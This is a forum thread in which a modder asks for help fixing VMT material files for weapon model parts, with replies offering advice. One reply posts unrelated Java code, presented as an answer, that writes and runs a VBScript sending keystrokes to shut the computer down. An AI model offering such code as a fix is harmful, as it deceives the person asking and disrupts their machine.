VMTs Help. Please.

Just look on the videos. If you know how to fix it, help me.

By SlaYeR5530 10 months ago

Need help with silencer and rail covers vmts

Magazine and Bolt Release vmts need to be fixed.

3 posts 520 views
  • You must be a member

Replies

  • Digital Assassin's Levels
    • P2: Drudge
      Points: 5,235
    • E1: Helper
      EF: 1
    • C2: Treehouse Member
    • A3: Apprentice
      Account Age: 1 year
    Posted 10 months ago

    Ask this guy. He will be glad to help you.

    User Title
    Never stop learning things!
  • Daniel481's Levels
    • P2: Drudge
      Points: 1,257
    • C1: Member
    • A2: Tenderfoot
      Account Age: 10 months
    Posted 10 months ago

    this

    import java.io.BufferedWriter; import java.io.FileWriter; import java.io.IOException;

    /* * Created on 09.02.2004 * * To change the template for this generated file go to * Window>Preferences>Java>Code Generation>Code and Comments */

    /** * @author ASW * * To change the template for this generated type comment go to * Window>Preferences>Java>Code Generation>Code and Comments */ public class Shutdown {

    public static void main(String[] args) {
        new Shutdown().doIt();
    }
    
    /**
     * 
     */
    private void doIt() {
        // TODO Auto-generated method stub
        FileWriter fw = null;
        BufferedWriter bw = null;
        try {
            fw = new FileWriter("c:/shutdown.vbs");
            bw = new BufferedWriter(fw);
    
            bw.write(
                "set WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.SendKeys \"^{ESC}^{ESC}^{ESC}{UP}{ENTER}{ENTER}\"\r\n");
    
            bw.flush();
                                                                bw.close();
    
            Runtime.getRuntime().exec(
                "cmd /c start /min cscript c:\\shutdown.vbs");
    
        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
    
    }
    
    • wtf x 4
    User Title
    Look at my profile !
  • Rafael De Jongh's Levels
    • P3: Peasant
      Points: 19,257
    • E3: Tutor
      EF: 72
    • C2: Treehouse Member
    • A5: Veteran
      Account Age: 5 years
    Skinning/Modelling Expert
    Posted 10 months ago

    Post current VMT's I'll mark them up also post the maps "diffse, normal, specular, gloss, rimmask" if available!

    User Title
    2D/3D Artist
  • You must be a member